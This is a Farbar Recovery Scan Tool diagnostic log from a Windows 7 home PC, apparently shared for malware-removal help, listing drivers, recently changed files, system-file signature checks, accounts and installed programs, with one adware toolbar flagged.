R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [561952 2016-06-24] (Trend Micro Inc.)
R1 tmumh; C:\Windows\System32\DRIVERS\TMUMH.sys [101088 2016-08-09] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [124752 2015-12-09] (Trend Micro Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-01 14:41 - 2016-12-01 14:42 - 00022344 _____ C:\Users\Owner\Desktop\FRST.txt
2016-12-01 14:18 - 2016-12-01 14:18 - 00000000 ____D C:\Users\Owner\Desktop\Old Firefox Data
2016-11-30 15:09 - 2016-11-30 15:09 - 00000000 ____D C:\Users\Owner\Desktop\FRST-OlderVersion
2016-11-29 23:58 - 2016-11-29 23:58 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2016-11-29 18:06 - 2016-12-01 14:41 - 00000000 ____D C:\FRST
2016-11-29 18:02 - 2016-11-30 15:09 - 02411520 _____ (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-11-28 14:52 - 2016-11-28 15:10 - 00002216 _____ C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk
2016-11-26 22:32 - 2016-12-01 14:36 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2016-11-26 21:50 - 2016-12-01 14:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-26 19:46 - 2016-11-29 18:26 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-26 19:45 - 2016-11-26 19:45 - 00001066 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-26 14:36 - 2016-11-26 14:45 - 00000000 ____D C:\KVRT_Data
2016-11-26 14:36 - 2016-11-26 14:36 - 00478392 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\31DADE60.sys
2016-11-26 14:00 - 2016-11-26 14:00 - 00000000 ____D C:\Users\Owner\AppData\Local\CEF
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Software Updater Beta
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Security Scan
2016-11-26 13:52 - 2016-11-26 13:51 - 00001015 _____ C:\Users\Public\Desktop\Kaspersky Security Scan.lnk
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Kaspersky Lab
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\Program Files (x86)\Kaspersky Lab
2016-11-26 13:49 - 2016-11-26 13:50 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-11-26 13:48 - 2016-11-26 13:48 - 02622304 _____ (Kaspersky Lab) C:\Users\Owner\Downloads\kss16.0.0.1344en_9702.exe
2016-11-26 13:45 - 2016-11-26 13:49 - 00211378 _____ C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
2016-11-26 13:44 - 2016-11-26 13:45 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2016-11-26 13:27 - 2016-11-26 13:39 - 22851472 _____ (Malwarebytes ) C:\Users\Owner\Downloads\mbam-setup-2.2.1.1043.exe
2016-11-26 13:10 - 2016-11-26 13:10 - 00000000 ____D C:\Users\Owner\AppData\Local\HP_Development_Company,_L
2016-11-26 13:03 - 2016-11-26 13:03 - 00002231 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-26 13:03 - 2016-11-26 13:03 - 00002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-11-26 13:02 - 2016-12-01 14:31 - 00000892 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-26 13:02 - 2016-12-01 14:07 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-26 13:02 - 2016-11-26 13:53 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2016-11-26 13:02 - 2016-11-26 13:03 - 00000000 ____D C:\Program Files (x86)\Google
2016-11-26 13:02 - 2016-11-26 13:02 - 00003892 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-11-26 13:02 - 2016-11-26 13:02 - 00003640 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-11-26 13:00 - 2016-11-26 13:00 - 01065376 _____ (Google Inc.) C:\Users\Owner\Downloads\ChromeSetup.exe
2016-11-25 18:38 - 2016-11-25 18:38 - 00000000 ____D C:\ProgramData\HP Inc
2016-11-13 01:25 - 2016-11-13 01:56 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2016-11-13 01:25 - 2016-11-13 01:26 - 00001303 _____ C:\Users\Owner\Desktop\Norton Installation Files.lnk
2016-11-13 01:25 - 2016-11-13 01:25 - 00000000 ____D C:\Users\Public\Downloads\Norton

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-01 14:34 - 2016-10-21 23:38 - 00000000 ____D C:\Users\Owner\AppData\Local\DP_Tower_3.7
2016-12-01 14:30 - 2013-07-16 13:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-01 14:30 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-01 14:19 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-01 14:19 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-01 09:53 - 2012-09-08 13:26 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-01 09:01 - 2012-05-15 19:44 - 00000000 ____D C:\Users\Owner\AppData\Roaming\HpUpdate
2016-12-01 04:28 - 2010-10-22 23:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-11-30 19:10 - 2016-10-22 00:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForOwner
2016-11-30 19:10 - 2016-10-22 00:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForOwner.job
2016-11-30 15:49 - 2013-05-25 16:08 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Folder
2016-11-30 15:18 - 2010-07-10 22:10 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-30 15:03 - 2009-07-14 00:32 - 00000000 ____D C:\Windows\Downloaded Program Files
2016-11-30 14:58 - 2013-07-27 22:55 - 00003356 _____ C:\Windows\System32\Tasks\RunAsStdUser Task
2016-11-30 14:58 - 2013-07-27 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
2016-11-30 14:55 - 2013-06-07 21:03 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Temp
2016-11-30 11:05 - 2016-02-22 09:53 - 00000010 _____ C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2016-11-29 20:54 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Roaming\21084ad9
2016-11-29 20:51 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\767c1f6b
2016-11-29 20:51 - 2010-07-10 22:12 - 00000000 ____D C:\Windows\PCHEALTH
2016-11-29 01:43 - 2013-05-25 16:09 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Recipes
2016-11-28 22:59 - 2009-07-14 00:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-28 22:59 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-28 15:10 - 2013-08-02 21:08 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2016-11-28 14:52 - 2013-06-07 21:05 - 00000000 ____D C:\Remote Programs
2016-11-26 20:32 - 2015-10-21 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 20:32 - 2010-07-11 00:29 - 00000000 ____D C:\Program Files\Java
2016-11-26 20:30 - 2015-10-21 19:55 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2016-11-26 20:27 - 2013-08-18 12:38 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-26 20:14 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-26 19:45 - 2013-07-16 14:09 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-26 04:58 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Help
2016-11-26 04:48 - 2009-07-13 23:45 - 00326960 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-25 18:37 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-25 18:36 - 2010-10-21 17:26 - 00080416 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-25 18:36 - 2010-07-10 22:09 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-25 18:29 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-25 18:18 - 2010-10-21 17:28 - 00000000 ____D C:\Users\Owner\AppData\Roaming\hpqLog
2016-11-25 18:06 - 2012-05-15 19:43 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-25 16:41 - 2009-09-06 19:40 - 00000000 ____D C:\SwSetup
2016-11-24 04:13 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Temp
2016-11-13 01:56 - 2010-09-28 03:51 - 00000000 ____D C:\ProgramData\Norton
2016-11-12 23:53 - 2012-09-08 13:26 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-12 23:53 - 2012-09-08 13:26 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-12 23:53 - 2012-02-20 15:56 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-12 23:53 - 2011-06-15 18:31 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-11-12 23:53 - 2010-07-10 22:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2013-12-25 01:41 - 2016-05-08 13:39 - 0000458 _____ () C:\Users\Owner\AppData\Roaming\wklnhst.dat
2016-02-22 09:53 - 2016-11-30 11:05 - 0000010 _____ () C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2012-05-15 19:41 - 2012-05-15 19:41 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-10 23:57 - 2010-07-10 23:57 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-10 23:51 - 2010-07-10 23:52 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-09-28 03:44 - 2010-09-28 03:44 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-10 23:50 - 2010-07-10 23:51 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-10 23:52 - 2010-07-10 23:56 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-28 03:45 - 2010-09-28 03:46 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-23 17:36

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Owner (01-12-2016 14:43:19)
Running from C:\Users\Owner\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-10-21 21:54:18)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2406275642-2542123288-3132197554-500 - Administrator - Disabled)
Guest (S-1-5-21-2406275642-2542123288-3132197554-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2406275642-2542123288-3132197554-1002 - Limited - Enabled)
Owner (S-1-5-21-2406275642-2542123288-3132197554-1000 - Administrator - Enabled) => C:\Users\Owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Disabled - Up to date) {8242D66F-41BD-4049-C2E6-E578E73B62A0}
AS: Trend Micro Internet Security (Disabled - Up to date) {3923378B-6787-4FC7-F856-DE0A9CBC281D}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

5 Card Slingo Deluxe (HKLM-x32\...\5 Card Slingo Deluxe) (Version: 1.0.9 - funkitron)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Aquascapes (HKLM-x32\...\54e64742d7c097e9a547ec51ec3e33c2) (Version: - GameHouse)
Aquascapes (HKLM-x32\...\BFG-Aquascapes) (Version: - )
Aquascapes Collector's Edition (HKLM-x32\...\Aquascapes Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Aquascapes Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
ATI Catalyst Install Manager (HKLM\...\{ECD0D4B5-FFA9-6E1B-A08D-58E82EA5EEB9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Barn Yarn Collector's Edition (HKLM-x32\...\Barn Yarn Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bumper Deluxe (HKLM-x32\...\Bumper Deluxe) (Version: - funkitron)
ccc-core-static (x32 Version: 2010.0617.855.14122 - ATI) Hidden
Chainz 2 Relinked (HKLM-x32\...\exent_663050) (Version: - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clutter II - He Said, She Said (HKLM-x32\...\310fe0ed83e67ea82706269a05741425) (Version: - )
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Delicious - Emily's Wonder Wedding Premium Edition (HKLM-x32\...\65a10d0b2572fd789018429552e72c01) (Version: - )
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Finding Hope (HKLM-x32\...\d21f1d9cc71efcf517e3da1e18d36787) (Version: - GameHouse)
Fishdom (remove only) (HKLM-x32\...\Fishdom) (Version: - )
Fishdom 3 (HKLM-x32\...\f787ff3ddadc8b46619e8324fac303ec) (Version: - )
Fishdom H2O - Hidden Odyssey™ (remove only) (HKLM-x32\...\Fishdom H2O - Hidden Odyssey™) (Version: - )
Fishdom™ 2 (HKLM-x32\...\22c5079ca968caf972807e4c92a273cc) (Version: - )
Five Card Frenzy (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7}) (Version: - Oberon Media)
GamesBar 1.1.0.5 (HKLM-x32\...\GamesBar) (Version: - Oberon Media, Inc.)
Gardenscapes (HKLM-x32\...\Gardenscapes_is1) (Version: 1.0 - Playrix Entertainment)
Gold Miner Vegas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113644907}) (Version: - Oberon Media)
Gold Miner Vegas (HKLM-x32\...\BFG-Gold Miner Vegas) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Object Crosswords (HKLM-x32\...\27054fe294c730c6d79be8b9c312346e) (Version: - )
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.10262.3295 - Hewlett-Packard)
HP Documentation (HKLM-x32\...\{5E25081D-9CB4-4B17-AD2B-8DF2DC335E85}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3611 - HP Photo Creations Powered by RocketLife)
HP Photosmart 7510 series Basic Device Software (HKLM\...\{0446B95B-C0FD-4DE9-BD8E-76015D05E4F3}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Photosmart 7510 series Help (HKLM-x32\...\{6357D25F-A9C9-4CC7-A1FB-0DCF344E7C40}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 7510 series Product Improvement Study (HKLM\...\{D9F55AA1-FD3E-47FF-A385-72ED53666D3F}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{EB58480C-0721-483C-B354-9D35A147999F}) (Version: 2.3.6 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{97174E88-52F9-445A-A28E-704A45332D19}) (Version: 4.0.108.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{E7F7C2F3-0BEF-471A-A6F3-4B43002034F4}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{B5FC1E1B-E70D-45F1-8E40-A3C30698B323}) (Version: 4.0.9.0 - Hewlett-Packard Company)
Insaniquarium Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Internet Explorer Toolbar 4.8 by SweetPacks (HKLM-x32\...\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}) (Version: 4.8.0000 - SweetIM Technologies Ltd.) <==== ATTENTION
Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Quest (remove only) (HKLM-x32\...\Jewel Quest) (Version: - )
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire III (remove only) (HKLM-x32\...\Jewel Quest Solitaire III) (Version: - )
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 16.0.0.1344 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 16.0.0.1344 - Kaspersky Lab) Hidden
Kaspersky Software Updater Beta (HKLM-x32\...\InstallWIX_{94C8D443-1D07-4E6D-A9EB-FDBA45A839D8}) (Version: 1.5.2.228 - Kaspersky Lab)
Kaspersky Software Updater Beta (x32 Version: 1.5.2.228 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2907 - CyberLink Corp.) Hidden
Letters from Nowhere Double Pack (HKLM-x32\...\5c5210d7d541dcde7bbbf44a769244f7) (Version: - )
Lottso Deluxe (HKLM-x32\...\exent_696450) (Version: - )
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Word 2002 (HKLM-x32\...\{911B0409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{B9966F27-9678-4620-9579-925E3084647E}) (Version: 07.03.0719 - Microsoft Corporation)
Microsoft Works 2004 Setup Launcher (HKLM-x32\...\Works2004Setup) (Version: - )
Microsoft Works Suite Add-in for Microsoft Word (HKLM-x32\...\{33BEE6F3-9987-4F98-A069-97A64EC8321A}) (Version: 7.0.0.0000 - Microsoft Corporation)
